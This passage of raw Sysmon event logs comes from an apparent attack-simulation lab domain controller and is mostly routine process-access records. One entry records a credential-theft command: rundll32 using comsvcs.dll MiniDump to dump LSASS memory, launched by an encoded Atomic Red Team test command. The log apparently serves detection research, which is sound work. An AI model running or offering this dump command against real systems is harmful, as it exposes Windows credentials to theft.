15:53:02.908{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.908{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.893{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.894{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.877{D28789B6-7CDE-5FA1-2001-000000008801}40203892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-2001-000000008801}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERN